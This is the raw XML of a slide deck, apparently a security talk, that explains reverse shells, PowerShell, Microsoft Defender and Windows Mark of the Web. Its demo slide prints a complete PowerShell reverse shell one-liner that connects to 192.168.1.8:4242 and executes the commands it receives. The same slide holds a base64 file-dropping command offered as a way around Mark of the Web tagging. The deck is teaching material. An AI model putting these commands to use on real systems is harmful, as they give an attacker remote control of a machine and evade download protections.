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4" r:id="rId8"/>
    <p:sldId id="273" r:id="rId9"/>
    <p:sldId id="275" r:id="rId10"/>
    <p:sldId id="261" r:id="rId11"/>
    <p:sldId id="276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its dangerous </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and why you should care</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>By Christopher iwen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25C6A-C83A-AF66-B7DB-A76959EB4726}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2930042" y="4365101"/>
            <a:ext cx="6125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"Know thy enemy and know yourself; in a hundred battles, you will never be defeated.”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Topics Covered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Shell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Defender</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mark of the Web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Reverse Shell or Remote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 shell session initiated from a remote (victim) machine, not from the attacker’s host. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why does it get used?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Successful exploit of a remote command execution (RCE) vulnerability, like Log4j, can use a reverse shell to obtain an interactive shell session on the target machine and continue their attack. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse shells can also work across a NAT or firewall.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632D38-E0B6-7FD3-D67E-AC5B76FF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2" y="2133600"/>
            <a:ext cx="5386379" cy="34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PowerShell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automation and configuration tool/framework that works well with your existing tools. It includes a command-line shell, an associated scripting language and a framework for processing cmdlets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why does it gets used?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>commonly used for automating the management of systems. It is also used to build, test, and deploy solutions, often in CI/CD environments.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How do you determine if it is Malicious?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This requires an understanding of the Intent and actions taken by the command.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CDB163-339B-B845-2ACD-871212D68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813" y="2415560"/>
            <a:ext cx="5078412" cy="3047643"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36817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Defender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it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>security app that helps individuals protect their data and devices, and stay safer online.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How does it work? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>malware protection, real-time security notifications, security tips, and identity theft monitoring using Known Signatures (hashes, specific string matches, commands/activity, etc.)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E09684-8354-D96F-EA32-85B7F0C4B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7200" y="170656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4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Defender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3352800"/>
            <a:ext cx="10133329" cy="2819400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What happens when it works?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blocks Malicious Activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Quarantines Malicious Software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What happens when it doesn’t work? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hacker is able to change settings, like turning off protections.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Catching the hacker becomes infinitely more difficult.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44125C-F4E0-5726-090E-8F52FB988B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7471" b="71279"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045942" y="1371600"/>
            <a:ext cx="1047920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Mark of the Web (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1"/>
              <a:t>MotW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0"/>
              <a:t>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18883" y="3463032"/>
            <a:ext cx="10514329" cy="2709168"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609493" marR="0" lvl="1" indent="-231607" algn="l" defTabSz="1218987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9999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Windows uses a simple technique to keep track of which binary files were downloaded from the Internet. Every downloaded file is tagged with a hidden NTFS Alternate Data Stream file named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Zone.Identifier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you see the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CMD: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/r</a:t>
            </a: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Powershell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Get-Item &lt;filename&gt; -Stream *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="304747" marR="0" lvl="0" indent="-304747" algn="l" defTabSz="1218987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99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can it be avoided?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-304747">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009999"/>
              </a:buClr>
              <a:buSzPct val="100000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base64 to create a file</a:t>
            </a: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7618412" y="1603729"/>
            <a:ext cx="3960972" cy="1859302"/>
          </a:xfrm>
        </p:spPr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Zone Identifier Value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609493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 Local computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609493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Local intranet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609493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Trusted sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609493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Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609493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Restricted sites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53EB9489-C853-76AD-974C-4CA43FA57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59" y="1442167"/>
            <a:ext cx="6050775" cy="202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838201"/>
            <a:ext cx="10896599" cy="1676399"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="12400" dirty="0"/>
              <a:t>Demo Time!!!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EB0C2-95AB-4A4C-4401-68BF0649D448}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="989012" y="2514600"/>
            <a:ext cx="108203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$client = New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>System.Net.Sockets.TCPClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>('192.168.1.8',4242);$stream = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>client.GetStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>();[byte[]]$bytes = 0..65535|%{0};while(($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stream.Read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>($bytes, 0, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bytes.Length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>)) -ne 0){;$data = (New-Object -TypeName </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>System.Text.ASCIIEncoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>GetString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>($bytes,0, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>);$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sendback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>iex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> $data 2&gt;&amp;1 | Out-String );$sendback2 = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sendback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> + 'PS ' + (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>).Path + '&gt; ';$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sendbyte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> = ([</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>text.encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>]::ASCII).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>GetBytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>($sendback2);$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stream.Write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>($sendbyte,0,$sendbyte.Length);$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stream.Flush</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>()};$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>client.Close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r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>$FileName3 = 'Powershell3.zip’;[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>IO.File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>]::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>WriteAllBytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>($FileName3, [Convert]::FromBase64String('UEsDBBQAAAAIAIMBZVWbYo0JIAAAACwAAAAIAAAAdGVzdC50eHT7/6+EIZWhmKGEIZMhjyGdQYEBnW/IYMRgzMDLwMUAAFBLAQIUABQAAAAIAIMBZVWbYo0JIAAAACwAAAAIAAAAAAAAAAAAAAAAAAAAAAB0ZXN0LnR4dFBLBQYAAAAAAQABADYAAABGAAAAAAA='))</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22651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580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PowerShell</vt:lpstr>
      <vt:lpstr>Topics Covered</vt:lpstr>
      <vt:lpstr>Reverse Shell or Remote Shell</vt:lpstr>
      <vt:lpstr>PowerShell</vt:lpstr>
      <vt:lpstr>Defender</vt:lpstr>
      <vt:lpstr>Defender</vt:lpstr>
      <vt:lpstr>Mark of the Web (MotW)</vt:lpstr>
      <vt:lpstr>Demo Time!!!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</dc:title>
  <dc:creator>chris iwen</dc:creator>
  <cp:lastModifiedBy>chris iwen</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-02-01T07:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-01T18:40:36Z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